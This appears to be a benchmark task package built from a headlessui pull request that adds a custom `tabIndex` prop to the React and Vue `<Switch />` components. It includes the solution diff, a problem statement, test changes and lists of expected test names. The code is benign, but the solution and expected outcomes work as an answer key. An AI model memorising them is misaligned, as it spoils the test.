diff --git a/packages/@headlessui-react/CHANGELOG.md b/packages/@headlessui-react/CHANGELOG.md index 61c0898..3908d51 100644 --- a/packages/@headlessui-react/CHANGELOG.md +++ b/packages/@headlessui-react/CHANGELOG.md @@ -15,6 +15,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Ensure `children` prop of `Field` component can be a render prop ([#2941](https://github.com/tailwindlabs/headlessui/pull/2941)) - Add `hidden` attribute to internal `<Hidden />` component when the `Features.Hidden` feature is used ([#2955](https://github.com/tailwindlabs/headlessui/pull/2955)) - Attempt form submission when pressing `Enter` on `Checkbox` component ([#2962](https://github.com/tailwindlabs/headlessui/pull/2962)) +- Allow setting custom `tabIndex` on the `<Switch />` component ([#2966](https://github.com/tailwindlabs/headlessui/pull/2966)) ## [2.0.0-alpha.4] - 2024-01-03 diff --git a/packages/@headlessui-react/src/components/switch/switch.tsx b/packages/@headlessui-react/src/components/switch/switch.tsx index 3adb57b..76a4ab8 100644 --- a/packages/@headlessui-react/src/components/switch/switch.tsx +++ b/packages/@headlessui-react/src/components/switch/switch.tsx @@ -116,12 +116,7 @@ type SwitchRenderPropArg = { changing: boolean disabled: boolean } -type SwitchPropsWeControl = - | 'aria-checked' - | 'aria-describedby' - | 'aria-labelledby' - | 'role' - | 'tabIndex' +type SwitchPropsWeControl = 'aria-checked' | 'aria-describedby' | 'aria-labelledby' | 'role' export type SwitchProps<TTag extends ElementType = typeof DEFAULT_SWITCH_TAG> = Props< TTag, @@ -136,6 +131,7 @@ export type SwitchProps<TTag extends ElementType = typeof DEFAULT_SWITCH_TAG> = form?: string autoFocus?: boolean disabled?: boolean + tabIndex?: number } > @@ -220,7 +216,7 @@ function SwitchFn<TTag extends ElementType = typeof DEFAULT_SWITCH_TAG>( ref: switchRef, role: 'switch', type: useResolveButtonType(props, internalSwitchRef), - tabIndex: 0, + tabIndex: props.tabIndex === -1 ? 0 : props.tabIndex ?? 0, 'aria-checked': checked, 'aria-labelledby': labelledBy, 'aria-describedby': describedBy, diff --git a/packages/@headlessui-vue/CHANGELOG.md b/packages/@headlessui-vue/CHANGELOG.md index bbcd06e..a778aa6 100644 --- a/packages/@headlessui-vue/CHANGELOG.md +++ b/packages/@headlessui-vue/CHANGELOG.md @@ -18,6 +18,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Prevent default behaviour when clicking outside of a `DialogPanel` ([#2919](https://github.com/tailwindlabs/headlessui/pull/2919)) - Don’t override explicit `disabled` prop for components inside `<MenuItem>` ([#2929](https://github.com/tailwindlabs/headlessui/pull/2929)) - Add `hidden` attribute to internal `<Hidden />` component when the `Features.Hidden` feature is used ([#2955](https://github.com/tailwindlabs/headlessui/pull/2955)) +- Allow setting custom `tabIndex` on the `<Switch />` component ([#2966](https://github.com/tailwindlabs/headlessui/pull/2966)) ## [1.7.17] - 2024-01-08 diff --git a/packages/@headlessui-vue/src/components/switch/switch.ts b/packages/@headlessui-vue/src/components/switch/switch.ts index cd10354..4746dee 100644 --- a/packages/@headlessui-vue/src/components/switch/switch.ts +++ b/packages/@headlessui-vue/src/components/switch/switch.ts @@ -78,6 +78,7 @@ export let Switch = defineComponent({ name: { type: String, optional: true }, value: { type: String, optional: true }, id: { type: String, default: () => `headlessui-switch-${useId()}` }, + tabIndex: { type: Number, default: 0 }, }, inheritAttrs: false, setup(props, { emit, attrs, slots, expose }) { @@ -143,14 +144,14 @@ export let Switch = defineComponent({ }) return () => { - let { id, name, value, form, ...theirProps } = props + let { id, name, value, form, tabIndex, ...theirProps } = props let slot = { checked: checked.value } let ourProps = { id, ref: switchRef, role: 'switch', type: type.value, - tabIndex: 0, + tabIndex: tabIndex === -1 ? 0 : tabIndex, 'aria-checked': checked.value, 'aria-labelledby': api?.labelledby.value, 'aria-describedby': api?.describedby.value,
Allow setting custom `tabIndex` on the `<Switch />` component This PR allows overriding the `tabIndex` of the `<Switch />` component if you need to change the tab index. However, we still need it to be focusable using the keyboard so we will always fallback to `0` even if `-1` was pased. Fixes: #2915
**Title** Expose a customizable `tabIndex` prop for the `<Switch />` component while preserving keyboard focusability. **Problem** The switch component always forced a `tabIndex` of 0, preventing developers from providing their own tab order. At the same time, it needed to stay focusable via the keyboard. **Root Cause** `tabIndex` was hard‑coded and listed among the internally controlled props, so any user‑supplied value was ignored. **Fix / Expected Behavior** - Introduce an optional `tabIndex` property that users can set. - Default the value to 0 when none is provided. - If a user passes `-1`, automatically treat it as 0 to keep the element focusable. - Remove `tabIndex` from the list of internally controlled props so that custom values are respected. - Update documentation/changelog to reflect the new capability. **Risk & Validation** - Verify that the switch remains reachable via keyboard navigation for all `tabIndex` values, especially when `-1` is supplied. - Run the component’s accessibility and interaction test suite to ensure no regressions. - Confirm that the addition does not interfere with other props or break existing usage patterns.
2,966
tailwindlabs/headlessui
diff --git a/packages/@headlessui-react/src/components/switch/switch.test.tsx b/packages/@headlessui-react/src/components/switch/switch.test.tsx index c65ddf5..b6988f2 100644 --- a/packages/@headlessui-react/src/components/switch/switch.test.tsx +++ b/packages/@headlessui-react/src/components/switch/switch.test.tsx @@ -59,6 +59,47 @@ describe('Rendering', () => { assertSwitch({ state: SwitchState.Off, label: 'Enable notifications' }) }) + describe('`tabIndex` attribute', () => { + it('should have a default tabIndex of `0`', () => { + render( + <Switch checked={false} onChange={console.log}> + <span>Enable notifications</span> + </Switch> + ) + assertSwitch({ + state: SwitchState.Off, + label: 'Enable notifications', + attributes: { tabindex: '0' }, + }) + }) + + it('should be possible to override the `tabIndex`', () => { + render( + <Switch checked={false} onChange={console.log} tabIndex={3}> + <span>Enable notifications</span> + </Switch> + ) + assertSwitch({ + state: SwitchState.Off, + label: 'Enable notifications', + attributes: { tabindex: '3' }, + }) + }) + + it('should not be possible to override the `tabIndex` to `-1`', () => { + render( + <Switch checked={false} onChange={console.log} tabIndex={-1}> + <span>Enable notifications</span> + </Switch> + ) + assertSwitch({ + state: SwitchState.Off, + label: 'Enable notifications', + attributes: { tabindex: '0' }, + }) + }) + }) + describe('`type` attribute', () => { it('should set the `type` to "button" by default', async () => { render( diff --git a/packages/@headlessui-react/src/test-utils/accessibility-assertions.ts b/packages/@headlessui-react/src/test-utils/accessibility-assertions.ts index 1b7beff..cf30183 100644 --- a/packages/@headlessui-react/src/test-utils/accessibility-assertions.ts +++ b/packages/@headlessui-react/src/test-utils/accessibility-assertions.ts @@ -1145,6 +1145,7 @@ export function assertSwitch( textContent?: string label?: string description?: string + attributes?: Record<string, string | null> }, switchElement = getSwitch() ) { @@ -1152,7 +1153,8 @@ export function assertSwitch( if (switchElement === null) return expect(switchElement).not.toBe(null) expect(switchElement).toHaveAttribute('role', 'switch') - expect(switchElement).toHaveAttribute('tabindex', '0') + let tabIndex = Number(switchElement.getAttribute('tabindex') ?? '0') + expect(tabIndex).toBeGreaterThanOrEqual(0) if (options.textContent) { expect(switchElement).toHaveTextContent(options.textContent) @@ -1182,6 +1184,11 @@ export function assertSwitch( default: assertNever(options.state) } + + // Ensure disclosure button has the following attributes + for (let attributeName in options.attributes) { + expect(switchElement).toHaveAttribute(attributeName, options.attributes[attributeName]) + } } catch (err) { if (err instanceof Error) Error.captureStackTrace(err, assertSwitch) throw err diff --git a/packages/@headlessui-vue/src/components/switch/switch.test.tsx b/packages/@headlessui-vue/src/components/switch/switch.test.tsx index 0b6c510..c4008b4 100644 --- a/packages/@headlessui-vue/src/components/switch/switch.test.tsx +++ b/packages/@headlessui-vue/src/components/switch/switch.test.tsx @@ -327,6 +327,38 @@ describe('Rendering', () => { expect(handleChange).toHaveBeenNthCalledWith(3, true) }) }) + + describe('`tabIndex` attribute', () => { + it('should have a default tabIndex of `0`', () => { + renderTemplate(html`<Switch :checked="false" :tabIndex="0">Enable notifications</Switch>`) + + assertSwitch({ + state: SwitchState.Off, + label: 'Enable notifications', + attributes: { tabindex: '0' }, + }) + }) + + it('should be possible to override the `tabIndex`', () => { + renderTemplate(html`<Switch :checked="false" :tabIndex="3">Enable notifications</Switch>`) + + assertSwitch({ + state: SwitchState.Off, + label: 'Enable notifications', + attributes: { tabindex: '3' }, + }) + }) + + it('should not be possible to override the `tabIndex` to `-1`', () => { + renderTemplate(html`<Switch :checked="false" :tabIndex="-1">Enable notifications</Switch>`) + + assertSwitch({ + state: SwitchState.Off, + label: 'Enable notifications', + attributes: { tabindex: '0' }, + }) + }) + }) }) describe('Render composition', () => { diff --git a/packages/@headlessui-vue/src/test-utils/accessibility-assertions.ts b/packages/@headlessui-vue/src/test-utils/accessibility-assertions.ts index 2c7bbd1..5d59ed8 100644 --- a/packages/@headlessui-vue/src/test-utils/accessibility-assertions.ts +++ b/packages/@headlessui-vue/src/test-utils/accessibility-assertions.ts @@ -978,6 +978,7 @@ export function assertSwitch( textContent?: string label?: string description?: string + attributes?: Record<string, string | null> }, switchElement = getSwitch() ) { @@ -985,7 +986,8 @@ export function assertSwitch( if (switchElement === null) return expect(switchElement).not.toBe(null) expect(switchElement).toHaveAttribute('role', 'switch') - expect(switchElement).toHaveAttribute('tabindex', '0') + let tabIndex = Number(switchElement.getAttribute('tabindex') ?? '0') + expect(tabIndex).toBeGreaterThanOrEqual(0) if (options.textContent) { expect(switchElement).toHaveTextContent(options.textContent) @@ -1015,6 +1017,11 @@ export function assertSwitch( default: assertNever(options.state) } + + // Ensure disclosure button has the following attributes + for (let attributeName in options.attributes) { + expect(switchElement).toHaveAttribute(attributeName, options.attributes[attributeName]) + } } catch (err) { if (err instanceof Error) Error.captureStackTrace(err, assertSwitch) throw err
[ "should be possible to override the `tabIndex`", "should transition in completely (duration defined in seconds)", "should transition in completely", "should transition in and out completely", "should transition in and out completely (render strategy = hidden)", "should not unmount the whole tree when some children are still transitioning" ]
[ "should be possible to get the text value from an element", "should strip out emojis when receiving the text from the element", "should strip out hidden elements", "should strip out aria-hidden elements", "should strip out role=\"img\" elements", "should be possible to get the text value from the aria-label", "should be possible to get the text value from the aria-label (even if there is content)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`, multiple)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents, multiple)", "A transition without appear=true does not insert classes during SSR", "should not overwrite className of children when as=Fragment", "should be possible to use a DescriptionProvider without using a Description", "should be possible to use a DescriptionProvider and a single Description, and have them linked", "should be possible to use a DescriptionProvider and multiple Description components, and have them linked", "should be possible to inert an element", "should not mark an element as inert when the hook is disabled", "should mark the element as not inert anymore, once all references are gone", "should be possible to transition", "should expose the correct components", "should render a `Field` component", "should render a `Field` component with a render prop", "should add `aria-disabled` when a `Field` is disabled", "should inherit the `disabled` state from a parent `Fieldset`", "should expose focus data attributes on the element", "should expose hover data attributes on the element", "should encode an input of {\"a\":\"b\"} to an form data output", "should encode an input of [1,2,3] to an form data output", "should encode an input of {\"id\":1,\"admin\":true,\"name\":{\"first\":\"Jane\",\"last\":\"Doe\",\"nickname\":{\"preferred\":\"JDoe\"}}} to an form data output", "should error when using an as=\"template\" with additional props", "should forward the props to the first child", "should forward the props via Functional Components", "should allow use of <slot> as children", "as=element", "as=template", "should fire the correct events 0", "should fire the correct events 1", "should fire the correct events 2", "should fire the correct events 3", "should fire the correct events 4", "should fire the correct events 5", "should fire the correct events 6", "should fire the correct events 7", "should fire the correct events 8", "should fire the correct events 9", "should fire the correct events 10", "should fire the correct events 11", "should fire the correct events 12", "should fire the correct events 13", "should fire the correct events 14", "should fire the correct events 15", "should fire the correct events 16", "should fire the correct events 17", "should fire the correct events 18", "should fire the correct events 19", "should fire the correct events 20", "should fire the correct events 21", "should be possible to server side render the Disclosure in a closed state", "should be possible to server side render the Disclosure in an open state", "should be possible to server side render the first Tab and Panel", "should be possible to server side render the defaultIndex Tab and Panel", "should render a `Fieldset` component", "should add an `aria-disabled` attribute when disabling the `Fieldset`", "should link a `Fieldset` to a nested `Legend`", "should not link a `Label` inside a `Field` to the `Fieldset`", "should be possible to cancel a transition at any time", "should be possible to server side render the selectedIndex=0 Tab and Panel", "should be possible to server side render the selectedIndex=1 Tab and Panel", "should be possible to use a LabelProvider without using a Label", "should be possible to use a LabelProvider and a single Label, and have them linked", "should be possible to use a LabelProvider and multiple Label components, and have them linked", "should be possible to use useLabels without using a Label", "should be possible to use useLabels and a single Label, and have them linked", "should be possible to use useLabels and multiple Label components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Label component", "should be possible to use useDescriptions without using a Description", "should be possible to use useDescriptions and a single Description, and have them linked", "should be possible to use useDescriptions and multiple Description components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Description component", "should be possible to use a Portal", "should be possible to use multiple Portal elements", "should cleanup the Portal root when the last Portal is unmounted", "should be possible to render multiple portals at the same time", "should be possible to tamper with the modal root and restore correctly", "should be possible to force the Portal into a specific element using Portal.Group", "should render a button", "should default to `type=\"button\"`", "should render a button using a render prop", "should map the `autoFocus` prop to a `data-autofocus` attribute", "should be possible to render a dummy component", "should be possible to merge classes when rendering", "should be possible to merge class fns when rendering", "should be possible to render a dummy component with some children as a callback", "should be possible to add a ref with a different name", "should be possible to passthrough props to a dummy component", "should be possible to change the underlying DOM node using the `as` prop", "should be possible to change the underlying DOM node using the `as` prop and still have a function as children", "should be possible to render the children only when the `as` prop is set to Fragment", "should forward all the props to the first child when using an as={Fragment}", "should error when we are rendering a Fragment with multiple children", "should not error when we are rendering a Fragment with multiple children when we don't passthrough additional props", "should error when we are applying props to a Fragment when we do not have a dedicated element", "should be possible to render a `static` dummy component (show = true)", "should be possible to render a `static` dummy component (show = false)", "should be possible to render an `unmount` dummy component (show = true)", "should be possible to render an `unmount` dummy component (show = false)", "should be possible to render an `unmount={false}` dummy component (show = true)", "should be possible to render an `unmount={false}` dummy component (show = false)", "should result in a typescript error", "should focus the first focusable element inside the FocusTrap", "should focus the autoFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap even if another element has autoFocus", "should warn when there is no focusable element inside the FocusTrap", "should not be possible to programmatically escape the focus trap", "should restore the previously focused element, before entering the FocusTrap, after the FocusTrap unmounts", "should stay in the FocusTrap when using `tab`, if there is only 1 focusable element", "should stay in the FocusTrap when using `shift+tab`, if there is only 1 focusable element", "should be possible to tab to the next focusable element within the focus trap", "should be possible to shift+tab to the previous focusable element within the focus trap", "should skip the initial \"hidden\" elements within the focus trap", "should be possible skip \"hidden\" elements within the focus trap", "should be possible skip disabled elements within the focus trap", "should not be possible to escape the FocusTrap due to strange tabIndex usage", "should be possible tab to the next focusable element within the focus trap", "should be possible shift+tab to the previous focusable element within the focus trap", "SSR-rendering a Portal should not error", "should be possible to force the Portal into a specific element using PortalGroup", "should render a control", "should have an `id` attached", "should be possible to override the `id`", "should mark the control as disabled, if the `Field` is disabled", "should link a control and a `Label` when inside a `Field`", "should link a control and multiple `Label` components when inside a `Field`", "should link a control and a `Description` when inside a `Field`", "should link a control and multiple `Description` components when inside a `Field`", "should link a control with a `Label` and a `Description` when inside a `Field`", "should be possible to click a `Label`, and focus the control when in a `Field`", "should not be possible to click a `Label`, if the `Label` has the `passive` prop", "should not be possible to click a `Label` and focus the control, if the control is disabled", "should not be possible to click a `Label` and focus the control, if the `Field` is disabled", "should not be possible to click a `Label` and focus the control, if the `Fieldset` is disabled", "should render native (hidden) form elements for the control", "should submit the form with all the data", "should reset the control when the form is reset", "should be possible to render a Switch without crashing", "should be possible to render an (on) Switch using a render prop", "should be possible to render an (off) Switch using a render prop", "should be possible to render an (on) Switch using an `as` prop", "should be possible to render an (off) Switch using an `as` prop", "should be possible to use the switch contents as the label", "should set the `type` to \"button\" by default", "should not set the `type` to \"button\" if it already contains a `type`", "should set the `type` to \"button\" when using the `as` prop which resolves to a \"button\"", "should not set the type if the \"as\" prop is not a \"button\"", "should not set the `type` to \"button\" when using the `as` prop which resolves to a \"div\"", "should be possible to use in an uncontrolled way", "should be possible to use in an uncontrolled way with a value", "should be possible to provide a default value", "should be possible to reset to the default value if the form is reset", "should still call the onChange listeners when choosing new values", "should have a default tabIndex of `0`", "should not be possible to override the `tabIndex` to `-1`", "should be possible to render a SwitchGroup, Switch and SwitchLabel", "should be possible to render a SwitchGroup, Switch and SwitchLabel (before the Switch)", "should be possible to render a SwitchGroup, Switch and SwitchLabel (after the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (after the Switch)", "should be possible to render a Switch.Group, Switch, Switch.Label and Switch.Description", "should be possible to put classes on a SwitchLabel", "should be possible to put classes on a SwitchDescription", "should be possible to put classes on a SwitchGroup", "should be possible to toggle the Switch with Space", "should not be possible to use Enter to toggle the Switch", "should submit the form on `Enter`", "should submit the form on `Enter` (when no submit button was found)", "should be possible to tab away from the Switch", "should be possible to toggle the Switch with a click", "should be possible to toggle the Switch with a click on the Label", "should not be possible to toggle the Switch with a click on the Label (passive)", "should be possible to set the `form`, which is forwarded to the hidden inputs", "should be possible to submit a form with an boolean value", "should be possible to submit a form with a provided string value", "should error when we are using a <Disclosure.Button /> without a parent <Disclosure />", "should error when we are using a <Disclosure.Panel /> without a parent <Disclosure />", "should be possible to render a Disclosure without crashing", "should be possible to render a Disclosure using a render prop", "should be possible to render a Disclosure in an open state by default", "should expose a close function that closes the disclosure", "should expose a close function that closes the disclosure and restores to a specific element", "should expose a close function that closes the disclosure and restores to a ref", "should not crash when using Suspense boundaries", "should be possible to render a Disclosure.Button using a render prop", "should be possible to render a Disclosure.Button using a render prop and an `as` prop", "should be possible to render Disclosure.Panel using a render prop", "should be possible to always render the Disclosure.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Disclosure.Panel", "should be possible to control the Disclosure.Panel by wrapping it in a Transition component", "should be possible to open the Disclosure with Enter", "should not be possible to open the disclosure with Enter when the button is disabled", "should be possible to close the disclosure with Enter when the disclosure is open", "should be possible to open the disclosure with Space", "should not be possible to open the disclosure with Space when the button is disabled", "should be possible to close the disclosure with Space when the disclosure is open", "should be possible to open a disclosure on click", "should not be possible to open a disclosure on right click", "should not be possible to open a disclosure on click when the button is disabled", "should be possible to close a disclosure on click", "should be possible to close the Disclosure by clicking on a Disclosure.Button inside a Disclosure.Panel", "should error when we are using a <RadioGroupOption /> without a parent <RadioGroup />", "should be possible to render a RadioGroup without crashing", "should be possible to render a RadioGroup without options and without crashing", "should be possible to render a RadioGroup, where the first element is tabbable (value is undefined)", "should be possible to render a RadioGroup, where the first element is tabbable (value is null)", "should be possible to render a RadioGroup with an active value", "should guarantee the radio option order after a few unmounts", "should be possible to render a RadioGroupOption with a render prop", "should set the checked v-slot info to true for the selected item (testing with objects, because Vue proxies)", "should be possible to put classes on a RadioGroup", "should be possible to put classes on a RadioGroupOption", "should be possible to disable a RadioGroup", "should be possible to disable a RadioGroup.Option", "should guarantee the order of DOM nodes when performing actions", "should be possible to use a custom component using the `as` prop without crashing", "should use object equality by default", "should be possible to compare null values by a field", "should be possible to compare objects by a field", "should be possible to compare objects by a comparator function", "should be possible to reset to the default value if the form is reset (using objects)", "should be possible to tab to the first item", "should not change the selected element on focus", "should be possible to tab to the active item", "should not change the selected element on focus (when selecting the active item)", "should be possible to tab out of the radio group (no selected value)", "should be possible to tab out of the radio group (selected value)", "should go to the previous item when pressing the ArrowLeft key", "should go to the previous item when pressing the ArrowUp key", "should go to the next item when pressing the ArrowRight key", "should go to the next item when pressing the ArrowDown key", "should select the current option when pressing space", "should select the current option only once when pressing space", "should be possible to change the current radio group value when clicking on a radio option", "should be a no-op when clicking on the same item", "should be possible to submit a form with a value", "should be possible to submit a form with a complex value object", "should generate css for an exposed state", "should generate the inverse \"not\" css for an exposed state", "should generate the ui-focus-visible variant", "should generate the ui-not-focus-visible variant", "should error when we are using a <DisclosureButton /> without a parent <Disclosure />", "should error when we are using a <DisclosurePanel /> without a parent <Disclosure />", "should be possible to render a DisclosureButton using a render prop", "should be possible to render a DisclosureButton using a render prop and an `as` prop", "should be possible to render DisclosurePanel using a render prop", "should be possible to always render the DisclosurePanel if we provide it a `static` prop", "should be possible to use a different render strategy for the DisclosurePanel", "should always open the DisclosurePanel because of a wrapping OpenClosed component", "should always close the DisclosurePanel because of a wrapping OpenClosed component", "should be possible to read the OpenClosed state", "should be possible to close the Disclosure by clicking on a DisclosureButton inside a DisclosurePanel", "should be possible to put the checkbox in an indeterminate state", "should be possible to put the checkbox in an default checked state", "should render a checkbox in an unchecked state", "should be possible to toggle a checkbox", "should be possible to toggle a checkbox by clicking it", "should be possible to render a Switch.Group, Switch and Switch.Label", "should be possible to render a Switch.Group, Switch and Switch.Label (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Label (after the Switch)", "should error when we are using a <RadioGroup.Option /> without a parent <RadioGroup />", "should expose internal data as a render prop", "should error when we are using a <PopoverButton /> without a parent <Popover />", "should error when we are using a <PopoverPanel /> without a parent <Popover />", "should error when we are using a <PopoverOverlay /> without a parent <Popover />", "should be possible to render a Popover without crashing", "should be possible to render a PopoverGroup with multiple Popover components", "should be possible to render a Popover using a render prop", "should expose a close function that closes the popover", "should expose a close function that closes the popover and restores to a specific element", "should expose a close function that closes the popover and restores to a ref", "should be possible to render a PopoverButton using a render prop", "should be possible to render a PopoverButton using a render prop and an `as` prop", "should be possible to render PopoverPanel using a render prop", "should be possible to always render the PopoverPanel if we provide it a `static` prop", "should be possible to use a different render strategy for the PopoverPanel", "should be possible to move the focus inside the panel to the first focusable element (very first link)", "should close the Popover, when PopoverPanel has the focus prop and you focus the open button", "should be possible to move the focus inside the panel to the first focusable element (skip hidden link)", "should be possible to move the focus inside the panel to the first focusable element (very first link) when the hidden render strategy is used", "should always open the PopoverPanel because of a wrapping OpenClosed component", "should always close the PopoverPanel because of a wrapping OpenClosed component", "should be possible to open the Popover with Enter", "should not be possible to open the popover with Enter when the button is disabled", "should be possible to close the popover with Enter when the popover is open", "should close other popover menus when we open a new one", "should close the Popover by pressing `Enter` on a PopoverButton inside a PopoverPanel", "should close the Popover menu, when pressing escape on the PopoverButton", "should close the Popover menu, when pressing escape on the PopoverPanel", "should be possible to close a sibling Popover when pressing escape on a sibling PopoverButton", "should be possible to Tab through the panel contents onto the next PopoverButton", "should be possible to place a focusable item in the PopoverGroup, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the PopoverGroup", "should close the Popover menu once we Tab out of the Popover", "should close the Popover menu once we Tab out of a Popover without focusable elements", "should close the Popover when the PopoverPanel has a focus prop", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal)", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal), and focus the next focusable item in line", "should focus the previous PopoverButton when Shift+Tab on the second PopoverButton", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel (inside a Portal)", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (heuristc based portal)", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton (using Portal's)", "should be possible to open the popover with Space", "should not be possible to open the popover with Space when the button is disabled", "should be possible to close the popover with Space when the popover is open", "should close the Popover by pressing `Space` on a PopoverButton inside a PopoverPanel", "should close the Popover by pressing `Enter` on a PopoverButton and go to the href of the `a` inside a PopoverPanel", "should be possible to open a popover on click", "should not be possible to open a popover on right click", "should not be possible to open a popover on click when the button is disabled", "should be possible to close a popover on click", "should be possible to close a Popover using a click on the PopoverOverlay", "should be possible to close the popover, and re-focus the button when we click outside on the body element", "should be possible to close the popover, and re-focus the button when we click outside on a non-focusable element", "should be possible to close the popover, by clicking outside the popover on another focusable element", "should be possible to close the popover, by clicking outside the popover on another element inside a focusable element", "should be possible to close the Popover by clicking on a PopoverButton inside a PopoverPanel", "should not close the Popover when clicking on a focusable element inside a static PopoverPanel", "should not close the Popover when clicking on a non-focusable element inside a static PopoverPanel", "should close the Popover when clicking outside of a static PopoverPanel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel (when using the `focus` prop)", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using Portals", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using nested Portals", "should be possible to nest Popover components and control them individually", "should not steal the ref from the child", "should render without crashing", "should be possible to render a Transition without children", "should yell at us when we forget the required show prop", "should render a div and its children by default", "should passthrough all the props (that we do not use internally)", "should render another component if the `as` prop is used and its children by default", "should passthrough all the props (that we do not use internally) even when using an `as` prop", "should render nothing when the show prop is false", "should be possible to change the underlying DOM tag", "should be possible to use a render prop", "should yell at us when we forget to forward the ref when using a render prop", "should yell at us when we forget to wrap the `<Transition.Child />` in a parent <Transition /> component", "should be possible to render a Transition.Child without children", "should be possible to use a Transition.Root and a Transition.Child", "should be possible to nest transition components", "should be possible to change the underlying DOM tag of the Transition.Child components", "should be possible to change the underlying DOM tag of the Transition component and Transition.Child components", "should be possible to use render props on the Transition.Child components", "should be possible to use render props on the Transition and Transition.Child components", "should yell at us when we forgot to forward the ref on one of the Transition.Child components", "should yell at us when we forgot to forward a ref on the Transition component", "should support new lines in class lists", "should be possible to passthrough the transition classes", "should be possible to passthrough the transition classes and immediately apply the enter transitions when appear is set to true", "should fire only one event for a given component change", "should error when we are using a <MenuButton /> without a parent <Menu />", "should error when we are using a <MenuItems /> without a parent <Menu />", "should error when we are using a <MenuItem /> without a parent <Menu />", "should be possible to render a Menu without crashing", "should not crash when rendering no children at all", "should be possible to render a Menu using a default render prop", "should be possible to render a Menu using a template `as` prop", "should yell when we render a Menu using a template `as` prop (default) that contains multiple children (if we passthrough props)", "should be possible to manually close the Menu using the exposed close function", "should be possible to render a MenuButton using a default render prop", "should be possible to render a MenuButton using a template `as` prop", "should be possible to render a MenuButton using a template `as` prop and a custom element", "should yell when we render a MenuButton using a template `as` prop that contains multiple children", "should be possible to render MenuItems using a default render prop", "should be possible to render MenuItems using a template `as` prop", "should yell when we render MenuItems using a template `as` prop that contains multiple children", "should be possible to always render the MenuItems if we provide it a `static` prop", "should be possible to use a different render strategy for the MenuItems", "should be possible to render MenuItem using a default render prop", "should be possible to render a MenuItem using a template `as` prop", "should not override an explicit disabled prop on MenuItems child", "should yell when we render a MenuItem using a template `as` prop that contains multiple children", "should be possible to swap the menu item with a button for example", "should mark all the elements between Menu.Items and Menu.Item with role none", "should always open the MenuItems because of a wrapping OpenClosed component", "should always close the MenuItems because of a wrapping OpenClosed component", "should be possible to render a TransitionChild that inherits state from the Menu", "should be possible to use a button as a menu item and invoke it upon Enter", "should be possible to open the menu with Enter", "should not be possible to open the menu with Enter when the button is disabled", "should have no active menu item when there are no menu items at all", "should focus the first non disabled menu item when opening with Enter", "should focus the first non disabled menu item when opening with Enter (jump over multiple disabled ones)", "should have no active menu item upon Enter key press, when there are no non-disabled menu items", "should be possible to close the menu with Enter when there is no active menuitem", "should be possible to close the menu with Enter and invoke the active menu item", "should be possible to open the menu with Space", "should not be possible to open the menu with Space when the button is disabled", "should focus the first non disabled menu item when opening with Space", "should focus the first non disabled menu item when opening with Space (jump over multiple disabled ones)", "should have no active menu item upon Space key press, when there are no non-disabled menu items", "should be possible to close the menu with Space when there is no active menuitem", "should be possible to close the menu with Space and invoke the active menu item", "should be possible to close an open menu with Escape", "should not focus trap when we use Tab", "should not focus trap when we use Shift+Tab", "should be possible to open the menu with ArrowDown", "should not be possible to open the menu with ArrowDown when the button is disabled", "should be possible to use ArrowDown to navigate the menu items", "should be possible to use ArrowDown to navigate the menu items and skip the first disabled one", "should be possible to use ArrowDown to navigate the menu items and jump to the first non-disabled one", "should be possible to open the menu with ArrowUp and the last item should be active", "should be possible to use ArrowUp to navigate the menu items and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled item", "should be possible to use ArrowUp to navigate the menu items", "should be possible to use the End key to go to the last menu item", "should be possible to use the End key to go to the last non disabled menu item", "should be possible to use the End key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon End key press, when there are no non-disabled menu items", "should be possible to use the PageDown key to go to the last menu item", "should be possible to use the PageDown key to go to the last non disabled menu item", "should be possible to use the PageDown key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon PageDown key press, when there are no non-disabled menu items", "should be possible to use the Home key to go to the first menu item", "should be possible to use the Home key to go to the first non disabled menu item", "should be possible to use the Home key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon Home key press, when there are no non-disabled menu items", "should be possible to use the PageUp key to go to the first menu item", "should be possible to use the PageUp key to go to the first non disabled menu item", "should be possible to use the PageUp key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon PageUp key press, when there are no non-disabled menu items", "should be possible to type a full word that has a perfect match", "should be possible to type a partial of a word", "should be possible to type words with spaces", "should not be possible to search for a disabled item", "should be possible to search for a word (case insensitive)", "should be possible to search for the next occurence", "should stay on the same item while keystrokes still match", "should be possible to open a menu on click", "should not be possible to open a menu on right click", "should not be possible to open a menu on click when the button is disabled", "should be possible to close a menu on click", "should be a no-op when we click outside of a closed menu", "should be possible to click outside of the menu which should close the menu", "should be possible to click outside of the menu which should close the menu (even if we press the menu button)", "should be possible to click outside of the menu on another menu button which should close the current menu and open the new menu", "should be possible to hover an item and make it active", "should make a menu item active when you move the mouse over it", "should be a no-op when we move the mouse and the menu item is already active", "should be a no-op when we move the mouse and the menu item is disabled", "should not be possible to hover an item that is disabled", "should be possible to mouse leave an item and make it inactive", "should be possible to mouse leave a disabled item and be a 